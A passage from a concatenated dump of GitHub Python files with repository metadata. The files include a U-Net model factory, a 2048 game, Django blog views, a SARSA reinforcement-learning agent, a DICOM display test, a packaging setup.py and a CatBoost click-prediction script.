nonlocal_mode='embedded_gaussian', attention_dsample=(2,2,2),
aggregation_mode='concat', prior_information_channels=None, conv_bloc_type=None, bayesian_skip_type='conv'):
model = _get_model_instance(name, tensor_dim)
if name in ['unet']:
model = model(n_classes=n_classes,
is_batchnorm=True,
in_channels=in_channels,
feature_scale=feature_scale,
is_deconv=False)
elif name in ['unet_nonlocal']:
model = model(n_classes=n_classes,
is_batchnorm=True,
in_channels=in_channels,
is_deconv=False,
nonlocal_mode=nonlocal_mode,
feature_scale=feature_scale)
elif name in ['unet_grid_gating', 'unet_pct_multi_att_dsv', 'unet_pct_multi_att_dsv_with_2fconv']:
model = model(n_classes=n_classes,
is_batchnorm=True,
in_channels=in_channels,
nonlocal_mode=nonlocal_mode,
feature_scale=feature_scale,
attention_dsample=attention_dsample,
is_deconv=False)
elif name in ['unet_pct_bayesian_multi_att_dsv', 'unet_pct_cascading_bayesian_multi_att_dsv']:
if prior_information_channels is None:
# suppose that prior information is stored in last channel
prior_information_channels = [in_channels - 1]
model = model(n_classes=n_classes,
is_batchnorm=True,
in_channels=in_channels,
prior_information_channels = prior_information_channels,
nonlocal_mode=nonlocal_mode,
feature_scale=feature_scale,
attention_dsample=attention_dsample,
conv_bloc_type=conv_bloc_type,
bayesian_skip_type=bayesian_skip_type,
is_deconv=False)
else:
raise 'Model {} not available'.format(name)
return model
def _get_model_instance(name, tensor_dim):
return {
'unet':{'2D': unet_2D, '3D': unet_3D},
'unet_nonlocal':{'2D': unet_nonlocal_2D, '3D': unet_nonlocal_3D},
'unet_grid_gating': {'3D': unet_grid_attention_3D},
'unet_pct_multi_att_dsv': {'3D': unet_pCT_multi_att_dsv_3D},
'unet_pct_bayesian_multi_att_dsv': {'3D': unet_pCT_bayesian_multi_att_dsv_3D},
'unet_pct_cascading_bayesian_multi_att_dsv': {'3D': unet_pCT_cascading_bayesian_multi_att_dsv_3D},
'unet_pct_multi_att_dsv_with_2fconv': {'3D': unet_pCT_multi_att_dsv_with_2fconv_3D}
}[name][tensor_dim]
| [
"tensu.wave@gmail.com"
] | tensu.wave@gmail.com |
ba8b5a1c25a0b68a6c7c75b2bac381e05780d884 | 640b2fc43cf917d11ba866a20af545e63842c39f | /Projects/2048-Game/2048-Game-Answer.py | c6ac333e91911536019d482edd0ad1ccf51f9c9b | [] | no_license | mosalaheg/Python-Programming-Language | ad11c50f58fb014a2f61bc9d8f6c9a6bc960ca98 | 0441b259e8c35b00047d7ed8b3ca62528c739eae | refs/heads/master | 2023-02-16T07:22:09.186463 | 2021-01-16T15:21:51 | 2021-01-16T15:21:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,561 | py | '''
Assigning values to the grid
The grid will look like this:
0,0 | 0,1 | 0,2 | 0,3
1,0 | 1,1 | 1,2 | 1,3
2,0 | 2,1 | 2,2 | 2,3
3,0 | 3,1 | 3,2 | 3,3
'''
import random
N = 4
grid = []
#This function prints the grid of 2048 Game as the game progresses
def print_grid():
print('--' + '-----' * N + '----')
for i in range(N):
print(end='| ')
for j in range(N):
r = (5 - len(str(grid[i][j]))) // 2
e = (' ' * r) + (str(grid[i][j]) if grid[i][j] != 0 else ' ') + (' ' * r)
if len(e) < 5: e += ' '
print(e, end='')
print(end=' |')
print()
print('--' + '-----' * N + '----')
#This function generates a cell with value 2
def generate_cell():
a = random.randint(0, N-1)
b = random.randint(0, N-1)
while grid[a][b] != 0:
a = random.randint(0, N-1)
b = random.randint(0, N-1)
grid[a][b] = 2
#This function rotates the grid by 90 degree
def rotate_90():
for i in range(N//2):
for j in range(i, N-i-1):
k = grid[i][j]
grid[i][j] = grid[N-j-1][i]
grid[N-j-1][i] = grid[N-i-1][N-j-1]
grid[N-i-1][N-j-1] = grid[j][N-i-1]
grid[j][N-i-1] = k
#This function checks if the game state reachs 2048 or not
def check_win():
#Search for cell with value 2048
for i in range(N):
for j in range(N):
if grid[i][j] == 2048:
return True
return False
#This function checks if the direction have state reachs 2048 or not
def check_available_direction():
for i in range(N):
j = 0
while j < N and grid[i][j] == 0: j +=1
while j < N and grid[i][j] != 0: j +=1
if j < N: return True
for k in range(N-1):
if grid[i][k] == grid[i][k+1] and grid[i][k] != 0:
return True
return False
#This function checks if any direction have state reachs 2048 or not
def check_available_move(d):
res = False
#check direction right
if d == 3: res = check_available_direction()
rotate_90()
#check direction down
if d == 5: res = check_available_direction()
rotate_90()
#check direction left
if d == 1: res = check_available_direction()
rotate_90()
#check direction up
if d == 2: res = check_available_direction()
rotate_90()
return res
#This function checks if the game state over or not
def check_full():
for i in range(N):
for j in range(N):
if grid[i][j] == 0:
return False
for i in range(N-1):
if grid[N-1][i] == grid[N-1][i+1]:
return False
for i in range(N-1):
if grid[i][N-1] == grid[i+1][N-1]:
return False
for i in range(N-1):
for j in range(N-1):
if grid[i][j] == grid[i+1][j] or grid[i][j+1] == grid[i][j]:
return False
return True
#This function merges the grid with given direction
def merge():
for i in range(N):
j = N-1
while j > 0:
if grid[i][j] == grid[i][j-1] and grid[i][j] != 0:
grid[i][j] = 0
grid[i][j-1] *= 2
j -= 1
j -= 1
#This function checks if the direction have state reachs 2048 or not
def merge_direction(d):
#merge direction right
if d == 3: merge()
rotate_90()
#merge direction down
if d == 5: merge()
rotate_90()
#merge direction left
if d == 1: merge()
rotate_90()
#merge direction up
if d == 2: merge()
rotate_90()
#This function moves the grid with given direction
def move():
for i in range(N):
temp = []
for j in range(N):
if grid[i][j] != 0:
temp += [grid[i][j]]
for j in range(N):
grid[i][j] = temp[j] if j < len(temp) else 0
#This function checks if the direction have state reachs 2048 or not
def move_direction(d):
#move direction left
if d == 1: move()
rotate_90()
#move direction up
if d == 2: move()
rotate_90()
#move direction right
if d == 3: move()
rotate_90()
#move direction down
if d == 5: move()
rotate_90()
#This function checks if given position is valid or not
def check_valid_direction(i):
return i in [1, 2, 3, 5]
#This function clears the grid
def grid_clear():
global grid
grid = [[0] * N for i in range(N)]
#MAIN FUNCTION
def play_game():
print("2048 Game!")
print("Welcome...")
print("============================")
while True:
#Generate a cell in the grid
generate_cell()
#Prints the grid
print_grid()
i = int(input('Enter the direction: '))
while not check_valid_direction(i) or not check_available_move(i):
i = int(input('Enter a valid direction: '))
#Move with the input direction
move_direction(i)
#Merge with the input direction
merge_direction(i)
#Move with the input direction
move_direction(i)
#Check if the state of the grid has a win state
if check_win():
#Prints the grid
print_grid()
print('Congrats, You won!')
break
#Check if the state of the grid has a tie state
if check_full():
#Prints the grid
print_grid()
print("Woah! That's a tie!")
break
while True:
grid_clear()
play_game()
c = input('Play Again [Y/N] ')
if c not in 'yY':
break
| [
"noreply@github.com"
] | mosalaheg.noreply@github.com |
100087e0a834aae204c9f9f5dc60991b44184e19 | ed1c02ef4c4841d26df38442a595d48d837ac51c | /jianguo/views.py | 7c07ac54627199d388be94034bfd3a8710dba5f3 | [] | no_license | shuoli84/jianguo | 12e6b684b47bbd4181b31266b5ab23edf4a8b5e2 | eec39d8e55f31405fb18788017b70be367809102 | refs/heads/master | 2021-01-10T19:51:27.227560 | 2014-10-09T04:39:03 | 2014-10-09T04:39:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,603 | py | import json
from PIL import Image
from cStringIO import StringIO
from allauth.account.views import SignupView, LoginView
import bleach
from django.conf import settings
from django.core.files.storage import default_storage
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseRedirect, HttpResponseNotFound
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.utils.decorators import method_decorator
from django.utils.translation import gettext as _
from django.views.decorators.http import require_http_methods
from django.views.generic import TemplateView
from jianguo.forms import UploadProfileImage, RegisterForm
from jianguo.models import Article
class IndexView(LoginView):
template_name = 'index.jade'
def dispatch(self, request, *args, **kwargs):
if request.user.is_authenticated():
return HttpResponseRedirect('/home/')
return super(IndexView, self).dispatch(request, *args, **kwargs)
index = IndexView.as_view()
class RegisterView(SignupView):
template_name = 'register.jade'
form_class = RegisterForm
register = RegisterView.as_view()
class ProfileView(TemplateView):
template_name = 'profile.jade'
def get_context_data(self, **kwargs):
profile = self.request.user.profile
context_data = super(ProfileView, self).get_context_data()
context_data.update({
'profile': profile
})
return context_data
def post(self, request):
career = request.POST.get('career', None)
introduction = request.POST.get('introduction', None)
profile = request.user.profile
if career:
profile.career = career
if introduction:
profile.introduction = introduction
profile.save()
return HttpResponse(status=200)
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ProfileView, self).dispatch(*args, **kwargs)
profile = ProfileView.as_view()
@login_required
@require_http_methods(["POST"])
def upload_picture(request):
form = UploadProfileImage(request.POST, request.FILES)
if form.is_valid():
pic_file = request.FILES['picture']
path = default_storage.save('pictures/' + pic_file.name, pic_file)
return HttpResponse(json.dumps({
'path': settings.MEDIA_URL + path,
}), content_type='application/json')
else:
return HttpResponse(json.dumps({
"error": form.errors
}), status=400, content_type="application/json")
@login_required
@require_http_methods(['POST'])
def set_profile_picture(request):
picture = request.POST['picture']
x = request.POST.get('x', '0')
y = request.POST.get('y', '0')
width = request.POST.get('width', '0')
height = request.POST.get('height', '0')
x = int(x)
y = int(y)
width = int(width)
height = int(height)
if picture.startswith('/media/'):
picture = picture[7:]
with default_storage.open(picture) as f:
original = Image.open(f)
original = original.crop((x, y, x + width, y + height))
original.thumbnail(settings.PROFILE_SIZE, Image.ANTIALIAS)
picture_io = StringIO()
original.save(picture_io, format='JPEG')
user = request.user
picture_io.seek(0)
new_path = default_storage.save('profile/profile_%s.jpeg' % user.id, picture_io)
user.profile.avatar = new_path
user.profile.save()
return HttpResponse(json.dumps({
'path': settings.MEDIA_URL + new_path
}), status=200, content_type="application/json")
class EditArticleView(TemplateView):
template_name = 'edit_article.jade'
allowed_tags = bleach.ALLOWED_TAGS + [
'p',
'u',
'div',
'h1',
'h2',
'h3',
'h4',
'h5',
'h6',
'img',
'figure',
'br',
'table',
'thead',
'tbody',
'tr',
'th',
'td',
]
allowed_attributes = bleach.ALLOWED_ATTRIBUTES
allowed_attributes.update({
'img': ['src', 'alt'],
'div': ['class', 'id'],
'figure': ['class']
})
def get_context_data(self, **kwargs):
context = super(EditArticleView, self).get_context_data(**kwargs)
article_id = kwargs.pop('article_id', None)
article = get_object_or_404(Article, pk=article_id)
context.update({'article': article})
return context
def post(self, request, **kwargs):
title = request.POST.get('title', None)
content = request.POST.get('content', None)
article_id = kwargs['article_id']
article = get_object_or_404(Article, pk=article_id)
if article.author_id != request.user.id:
return HttpResponseForbidden(_('You are not the author'))
if title:
article.title = title
if article:
content = bleach.clean(content, tags=self.allowed_tags, attributes=self.allowed_attributes)
article.content = content
article.save()
return HttpResponse(status=200)
edit_article = EditArticleView.as_view()
class ViewArticleView(TemplateView):
template_name = 'view_article.jade'
def get(self, request, *args, **kwargs):
article_id = kwargs['article_id']
article = get_object_or_404(Article, pk=article_id)
if not article.published and article.author_id != self.request.user.id:
return HttpResponseNotFound(_("The article does not exist"))
if article.author_id == request.user.id:
return HttpResponseRedirect('/article/%s/edit/' % article_id)
return super(ViewArticleView, self).get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ViewArticleView, self).get_context_data(**kwargs)
article_id = kwargs['article_id']
article = get_object_or_404(Article, pk=article_id)
context.update({'article': article})
return context
view_article = ViewArticleView.as_view()
@login_required
@require_http_methods(['POST'])
def new_article(request):
article = Article()
article.author = request.user
article.created_at = timezone.now()
article.save()
return HttpResponseRedirect('/article/%s/edit/' % article.id)
@login_required
@require_http_methods(['POST'])
def publish_article(request, article_id):
article = get_object_or_404(Article, pk=article_id)
if article.author_id != request.user.id:
return HttpResponseForbidden('You are not the author')
should_publish = request.POST.get('publish', 'true')
if should_publish == 'true':
article.published = True
else:
article.published = False
article.save()
return HttpResponse(json.dumps({
'published': article.published
}), status=200, content_type='application/json')
class UserHomeView(TemplateView):
template_name = 'user_home.jade'
def get_context_data(self, **kwargs):
context = super(UserHomeView, self).get_context_data(**kwargs)
context.update({
'articles': Article.objects.filter(Q(published=True) | Q(author_id=self.request.user.id)).order_by('-created_at')
})
return context
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserHomeView, self).dispatch(*args, **kwargs)
user_home = UserHomeView.as_view()
| [
"shuoli84@gmail.com"
] | shuoli84@gmail.com |
d9710887764f46586e84460a1df8a1f12d86b0f2 | c8b7c217a0b9ecb69913ccaf533348167a5f6fd4 | /sarsa_old_c.py | 747a60e5cedcf2ce102c55c44155e010ab50bea5 | [] | no_license | vaishnavh/gridworld | 343701aab897c0015fbfaf7bf4665519efba56a2 | 806bdc6ad11fd6a7ea137e8a4e3bac599a4ae9b3 | refs/heads/master | 2020-04-13T17:24:39.158075 | 2015-03-11T16:43:25 | 2015-03-11T16:43:25 | 31,503,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,565 | py | #
# Copyright (C) 2008, Brian Tanner
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Revision: 1011 $
# $Date: 2009-02-11 22:29:54 -0700 (Wed, 11 Feb 2009) $
# $Author: brian@tannerpages.com $
# $HeadURL: http://rl-library.googlecode.com/svn/trunk/projects/packages/examples/mines-sarsa-python/sample_sarsa_agent.py $
import random
import sys
import copy
import pickle
from rlglue.agent.Agent import Agent
from rlglue.agent import AgentLoader as AgentLoader
from rlglue.types import Action
from rlglue.types import Observation
from rlglue.utils import TaskSpecVRLGLUE3
from random import Random
import math
# This is a very simple Sarsa agent for discrete-action, discrete-state
# environments. It uses epsilon-greedy exploration.
#
# We've made a decision to store the previous action and observation in
# their raw form, as structures. This code could be simplified and you
# could store them just as ints.
# TO USE THIS Agent [order doesn't matter]
# NOTE: I'm assuming the Python codec is installed an is in your Python path
# - Start the rl_glue executable socket server on your computer
# - Run the SampleMinesEnvironment and SampleExperiment from this or a
# different codec (Matlab, Python, Java, C, Lisp should all be fine)
# - Start this agent like:
# $> python sample_sarsa_agent.py
class sarsa_agent(Agent):
randGenerator=Random()
lastAction=Action()
lastObservation=Observation()
sarsa_stepsize = 0.4
sarsa_epsilon = 0.1
sarsa_gamma = 0.9
episodeCount = 0
numStates = 0
numActions = 0
value_function = None
policyFrozen=False
exploringFrozen=False
def agent_init(self,taskSpecString):
TaskSpec = TaskSpecVRLGLUE3.TaskSpecParser(taskSpecString)
if TaskSpec.valid:
assert len(TaskSpec.getIntObservations())==1, "expecting 1-dimensional discrete observations"
assert len(TaskSpec.getDoubleObservations())==0, "expecting no continuous observations"
assert not TaskSpec.isSpecial(TaskSpec.getIntObservations()[0][0]), " expecting min observation to be a number not a special value"
assert not TaskSpec.isSpecial(TaskSpec.getIntObservations()[0][1]), " expecting max observation to be a number not a special value"
self.numStates=TaskSpec.getIntObservations()[0][1]+1;
assert len(TaskSpec.getIntActions())==1, "expecting 1-dimensional discrete actions"
assert len(TaskSpec.getDoubleActions())==0, "expecting no continuous actions"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][0]), " expecting min action to be a number not a special value"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][1]), " expecting max action to be a number not a special value"
self.numActions=TaskSpec.getIntActions()[0][1]+1;
self.value_function=[self.numActions*[0.0] for i in range(self.numStates)]
self.episodeCount = 0
else:
print "Task Spec could not be parsed: "+taskSpecString;
self.lastAction=Action()
self.lastObservation=Observation()
def egreedy(self, state):
maxIndex=0
a=1
if not self.exploringFrozen and self.randGenerator.random()<self.sarsa_epsilon:
return self.randGenerator.randint(0,self.numActions-1)
return self.value_function[state].index(max(self.value_function[state]))
def agent_start(self,observation):
theState=observation.intArray[0]
thisIntAction=self.egreedy(theState)
returnAction=Action()
returnAction.intArray=[thisIntAction]
self.sarsa_epsilon = math.exp(-0.008*self.episodeCount) + 0.15
self.sarsa_stepsize = 0.4
#self.sarsa_stepsize = min([math.exp(-0.005*self.episodeCount),1])
#print self.sarsa_epsilon
self.episodeCount += 1
self.lastAction=copy.deepcopy(returnAction)
self.lastObservation=copy.deepcopy(observation)
return returnAction
def agent_step(self,reward, observation):
newState=observation.intArray[0]
lastState=self.lastObservation.intArray[0]
lastAction=self.lastAction.intArray[0]
newIntAction=self.egreedy(newState)
Q_sa=self.value_function[lastState][lastAction]
Q_sprime_aprime=self.value_function[newState][newIntAction]
new_Q_sa=Q_sa + self.sarsa_stepsize * (reward + self.sarsa_gamma * Q_sprime_aprime - Q_sa)
if not self.policyFrozen:
self.value_function[lastState][lastAction]=new_Q_sa
returnAction=Action()
returnAction.intArray=[newIntAction]
self.lastAction=copy.deepcopy(returnAction)
self.lastObservation=copy.deepcopy(observation)
return returnAction
def agent_end(self,reward):
lastState=self.lastObservation.intArray[0]
lastAction=self.lastAction.intArray[0]
Q_sa=self.value_function[lastState][lastAction]
new_Q_sa=Q_sa + self.sarsa_stepsize * (reward - Q_sa)
if not self.policyFrozen:
self.value_function[lastState][lastAction]=new_Q_sa
def agent_cleanup(self):
pass
def save_value_function(self, fileName):
theFile = open(fileName, "w")
pickle.dump(self.value_function, theFile)
theFile.close()
def load_value_function(self, fileName):
theFile = open(fileName, "r")
self.value_function=pickle.load(theFile)
theFile.close()
def agent_message(self,inMessage):
# Message Description
# 'freeze learning'
# Action: Set flag to stop updating policy
#
if inMessage.startswith("freeze learning"):
self.policyFrozen=True
return "message understood, policy frozen"
# Message Description
# unfreeze learning
# Action: Set flag to resume updating policy
#
if inMessage.startswith("unfreeze learning"):
self.policyFrozen=False
return "message understood, policy unfrozen"
#Message Description
# freeze exploring
# Action: Set flag to stop exploring (greedy actions only)
#
if inMessage.startswith("freeze exploring"):
self.exploringFrozen=True
return "message understood, exploring frozen"
#Message Description
# unfreeze exploring
# Action: Set flag to resume exploring (e-greedy actions)
#
if inMessage.startswith("unfreeze exploring"):
self.exploringFrozen=False
return "message understood, exploring frozen"
#Message Description
# save_policy FILENAME
# Action: Save current value function in binary format to
# file called FILENAME
#
if inMessage.startswith("save_policy"):
splitString=inMessage.split(" ");
self.save_value_function(splitString[1]);
print "Saved.";
return "message understood, saving policy"
#Message Description
# load_policy FILENAME
# Action: Load value function in binary format from
# file called FILENAME
#
if inMessage.startswith("load_policy"):
splitString=inMessage.split(" ")
self.load_value_function(splitString[1])
print "Loaded."
return "message understood, loading policy"
return "SampleSarsaAgent(Python) does not understand your message."
if inMessage.startswith("reset_run"):
self.episodeCount = 0
print "Episode Reset."
return "message understood, resetting run"
return "SampleSarsaAgent(Python) does not understand your message."
if __name__=="__main__":
AgentLoader.loadAgent(sarsa_agent())
| [
"vaishnavh.nagarajan@gmail.com"
] | vaishnavh.nagarajan@gmail.com |
13d05cb39bba97f674f5ca270d5b2d2e124d3ff1 | 677463864f16211de9b9449af003ba9394779815 | /01_hash/q2_전화번호 목록.py | dddb06e26a5e9769aff19c6f84bbd2091a4ce2b2 | [] | no_license | seydouxxx/programmersLearningSet | c1bb13de8c63126d3108dbfe6e63a3a49f988fc7 | a7f2e37b10bf0d30601d74b51f5b1935b53b3b64 | refs/heads/main | 2023-05-14T13:06:11.580997 | 2021-06-07T11:59:37 | 2021-06-07T11:59:37 | 368,510,950 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | # 20210518
def solution(phone_book):
d = dict()
for n in phone_book:
d[n] = 0
for n in phone_book:
t = ""
for c in n[:-1]:
t += c
if (t not in d):
return False
return True | [
"risc@kakao.com"
] | risc@kakao.com |
4b74f65c26c7b559cf75340d7f17ac6af0f1a7dc | 36c76076b0be2c6e8e517ff745e0e5d50f2c4293 | /scripts/plotImageTest.py | 34d6b33c481a28f64dee12bb70335dff5c0cf41f | [] | no_license | helrick/DicomAnonymizer | b2148e36e7b3375a0fe53f99ab3d498d8f0d1153 | 9e633ff7690dd2c46a0da597bcbebcc153c8cb7b | refs/heads/master | 2023-01-18T17:27:20.615572 | 2020-12-04T12:48:11 | 2020-12-04T12:48:11 | 119,464,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,114 | py | '''
Testing the embedding of a dicom image inside a wxPython GUI window
'''
import dicom
import matplotlib
import wx
matplotlib.use('WXAgg')
from matplotlib.figure import Figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigCanvas
#for displaying the image as part of a GUI window
def main():
ds = dicom.read_file('xr_tspine.dcm')
class Window(wx.Frame):
title = 'testing plot embedding'
def __init__(self):
wx.Frame.__init__(self, None, -1, self.title)
self.create_main_panel()
self.draw_figure()
def create_main_panel(self):
self.panel = wx.Panel(self)
self.fig = Figure()
self.canvas = FigCanvas(self.panel, -1, self.fig)
def draw_figure(self):
ds = dicom.read_file('xr_tspine.dcm')
self.data = map(ds.pixel_array)
if __name__ == '__main__':
app = wx.PySimpleApp()
app.MainLoop()
'''
#for simply displaying the image
import pylab
def main():
ds = dicom.read_file('xr_tspine.dcm')
pylab.imshow(ds.pixel_array, cmap=pylab.cm.bone)
pylab.axis('off')
pylab.show()
main()
'''
| [
"hillary.elrick@gmail.com"
] | hillary.elrick@gmail.com |
b2fc2a7a9e5cfd93c15fce3f77b061f55bfa1b3d | 8774de94e7a7e320cfe0ff3cd54370c63327ea08 | /setup.py | 24657a62294916121751e1afadee2dfc40147796 | [] | no_license | OMO-NOSA/pgbackup-tool | fa9ae3c2fbb6a4ecc1c0da05b37558c61d67addd | da05e658b58b41869a7eb402c4ea51cca02d2427 | refs/heads/master | 2021-06-24T23:41:09.729765 | 2019-12-01T11:17:47 | 2019-12-01T11:17:47 | 225,121,137 | 0 | 0 | null | 2021-04-30T21:55:50 | 2019-12-01T07:11:36 | Python | UTF-8 | Python | false | false | 679 | py | from setuptools import find_packages, setup
with open('README.md', 'r') as f:
long_description = f.read()
setup(
name='pgbackup',
version= '0.1.0',
author = 'Nosa Omorodion',
author_email='nosdgenius@gmail.com',
description='A utility for backing up PostgreSQL databases',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/OMO-NOSA/pgbackup tool',
packages=find_packages('src'),
package_dir={'': 'src'},
install_requires=['boto3'],
python_requires ='>=3.6',
entry_points={
'console_scripts': [
'pgbackup=pgbackup.cli:main',
],
}
)
| [
"japhet.omorodion@gmail.com"
] | japhet.omorodion@gmail.com |
9ec87df973d15b7a680f9953251805be2e3cc00e | 5ee1288e54ebbd25c402d9dd6ce88b0fab6a631b | /rank2_munish/boost_final.py | d593b5b539765054ce1e5f39ac022b66784bdeb4 | [] | no_license | pyreqt/ML-Challenge-3 | 7853039774340dd060e1644f1c16509ad0c5301b | 518777cd1374f998e057092b7b50dc2e10007f57 | refs/heads/master | 2020-03-27T02:36:34.286174 | 2018-08-23T05:14:31 | 2018-08-23T05:14:31 | 145,803,465 | 0 | 0 | null | 2018-08-23T05:10:09 | 2018-08-23T05:10:09 | null | UTF-8 | Python | false | false | 7,402 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 31 15:36:56 2017
@author: mbansa001c
"""
print ('loading libraries and data')
import pandas as pd
from catboost import CatBoostClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import os
train = pd.read_csv("train.csv")
test = pd.read_csv("test.csv")
train['siteid'].fillna(-999, inplace=True)
test['siteid'].fillna(-999, inplace=True)
train['browserid'].fillna("None", inplace=True)
test['browserid'].fillna("None", inplace=True)
train['devid'].fillna("None", inplace=True)
test['devid'].fillna("None", inplace=True)
train['datetime'] = pd.to_datetime(train['datetime'])
test['datetime'] = pd.to_datetime(test['datetime'])
train['tweekday'] = train['datetime'].dt.weekday
train['thour'] = train['datetime'].dt.hour
train['tminute'] = train['datetime'].dt.minute
test['tweekday'] = test['datetime'].dt.weekday
test['thour'] = test['datetime'].dt.hour
test['tminute'] = test['datetime'].dt.minute
#### training only for the offers in test data #####
train_new=train[train['offerid'].isin(test['offerid'])]
train_a_b=train_new[train_new['countrycode'].isin(['a','b'])]
train_c_f=train_new[train_new['countrycode'].isin(['c','d','e','f'])]
test_a_b=test[test['countrycode'].isin(['a','b'])]
test_c_f=test[test['countrycode'].isin(['c','d','e','f'])]
trainY_df = train_a_b[['ID','click']]
train_a_b.drop(['click'], axis=1, inplace=True)
########join train and test########
df_all = pd.concat([train_a_b, test_a_b])
############ feature engineering, category count,offer count, offer access to users,week and hour level counts############
catg_cnt=df_all.groupby(['siteid'])['category'].nunique().reset_index().rename(columns = {'category':'catg_cnt'})
offer_cnt=df_all.groupby(['siteid'])['offerid'].nunique().reset_index().rename(columns = {'offerid':'offer_cnt'})
offer_id_cnt=df_all.groupby(['siteid','offerid'])['ID'].nunique().reset_index().rename(columns = {'ID':'offer_id_cnt'})
df1=pd.merge(df_all, catg_cnt, how='left', on=['siteid'])
df2=pd.merge(df1, offer_cnt, how='left', on=['siteid'])
df3=pd.merge(df2, offer_id_cnt, how='left', on=['siteid','offerid'])
df3['site_user_cnt'] = df3.groupby(['siteid'])['ID'].transform('count')
df3['user_week_cnt'] = df3.groupby(['siteid','tweekday'])['ID'].transform('count')
df3['user_hr_cnt'] = df3.groupby(['siteid','tweekday','thour'])['ID'].transform('count')
df3['offer_user_share']=df3['offer_id_cnt']/df3['site_user_cnt']
df3['week_user_share']=df3['user_week_cnt']/df3['site_user_cnt']
df3['hr_user_share']=df3['user_hr_cnt']/df3['user_week_cnt']
##################
cols = ['siteid','offerid','category','merchant']
for x in cols:
df3[x] = df3[x].astype('object')
cols_to_use1=['siteid','user_hr_cnt','week_user_share','hr_user_share','merchant', 'catg_cnt', 'user_week_cnt', 'offer_cnt', 'site_user_cnt', 'browserid', 'tweekday', 'devid', 'offerid', 'thour', 'category','countrycode','offer_user_share','tminute']
###########splitting train test after feature creation###########
num_train = len(train_a_b)
X_train = df3[:num_train]
X_test = df3[num_train:]
train_target=pd.merge(X_train,trainY_df,how='inner',on=['ID'])
sampled=train_target.sample(frac=0.3)
trainX = sampled[cols_to_use1]
trainX.head()
trainY = sampled['click']
# catboost accepts categorical variables as indexes
cat_cols = [0,4,9,10,11,12,13,14,15]
print ('train model........')
X_train1, X_test1, y_train1, y_test1 = train_test_split(trainX, trainY, test_size = 0.40)
model = CatBoostClassifier(depth=8, iterations=200, learning_rate=0.1, eval_metric='AUC', random_seed=1,calc_feature_importance=True)
model.fit(X_train1
,y_train1
,cat_features=cat_cols
,eval_set = (X_test1, y_test1)
,use_best_model = True
)
preds_class = model.predict(X_test1)
print("accuracy = {}".format(accuracy_score(y_test1, preds_class)))
print(model.feature_importance_)
print ('making predictions.................')
#### predictions for test #########
pred_a_b = model.predict_proba(X_test[cols_to_use1])[:,1]
sub_a_b=pd.DataFrame({'ID':test_a_b['ID'],'click':pred_a_b})
################################ Repeat from here for c,d,e,f countries again using train_c_f and test_c_f##############
trainY_df = train_c_f[['ID','click']]
train_c_f.drop(['click'], axis=1, inplace=True)
########join train and test########
df_all = pd.concat([train_c_f, test_c_f])
############ feature engineering, category count,offer count, offer access to users,week and hour level counts############
catg_cnt=df_all.groupby(['siteid'])['category'].nunique().reset_index().rename(columns = {'category':'catg_cnt'})
offer_cnt=df_all.groupby(['siteid'])['offerid'].nunique().reset_index().rename(columns = {'offerid':'offer_cnt'})
offer_id_cnt=df_all.groupby(['siteid','offerid'])['ID'].nunique().reset_index().rename(columns = {'ID':'offer_id_cnt'})
df1=pd.merge(df_all, catg_cnt, how='left', on=['siteid'])
df2=pd.merge(df1, offer_cnt, how='left', on=['siteid'])
df3=pd.merge(df2, offer_id_cnt, how='left', on=['siteid','offerid'])
df3['site_user_cnt'] = df3.groupby(['siteid'])['ID'].transform('count')
df3['user_week_cnt'] = df3.groupby(['siteid','tweekday'])['ID'].transform('count')
df3['user_hr_cnt'] = df3.groupby(['siteid','tweekday','thour'])['ID'].transform('count')
df3['offer_user_share']=df3['offer_id_cnt']/df3['site_user_cnt']
df3['week_user_share']=df3['user_week_cnt']/df3['site_user_cnt']
df3['hr_user_share']=df3['user_hr_cnt']/df3['user_week_cnt']
##################
cols = ['siteid','offerid','category','merchant']
for x in cols:
df3[x] = df3[x].astype('object')
cols_to_use1=['siteid','user_hr_cnt','week_user_share','hr_user_share','merchant', 'catg_cnt', 'user_week_cnt', 'offer_cnt', 'site_user_cnt', 'browserid', 'tweekday', 'devid', 'offerid', 'thour', 'category','countrycode','offer_user_share','tminute']
###########splitting train test after feature creation###########
num_train = len(train_c_f)
X_train = df3[:num_train]
X_test = df3[num_train:]
train_target=pd.merge(X_train,trainY_df,how='inner',on=['ID'])
sampled=train_target.sample(frac=0.3)
trainX = sampled[cols_to_use1]
trainX.head()
trainY = sampled['click']
# catboost accepts categorical variables as indexes
cat_cols = [0,4,9,10,11,12,13,14,15]
X_train1, X_test1, y_train1, y_test1 = train_test_split(trainX, trainY, test_size = 0.40)
model = CatBoostClassifier(depth=8, iterations=200, learning_rate=0.1, eval_metric='AUC', random_seed=1,calc_feature_importance=True)
model.fit(X_train1
,y_train1
,cat_features=cat_cols
,eval_set = (X_test1, y_test1)
,use_best_model = True
)
preds_class = model.predict(X_test1)
print("accuracy = {}".format(accuracy_score(y_test1, preds_class)))
print(model.feature_importance_)
#### predictions for test #########
pred_c_f = model.predict_proba(X_test[cols_to_use1])[:,1]
sub_c_f=pd.DataFrame({'ID':test_c_f['ID'],'click':pred_c_f})
##join predictions after repeating for c to f countries###
final=sub_a_b.append(sub_c_f)
#write output
final.to_csv("submission.csv",index=False)
| [
"manisara0000@gmail.com"
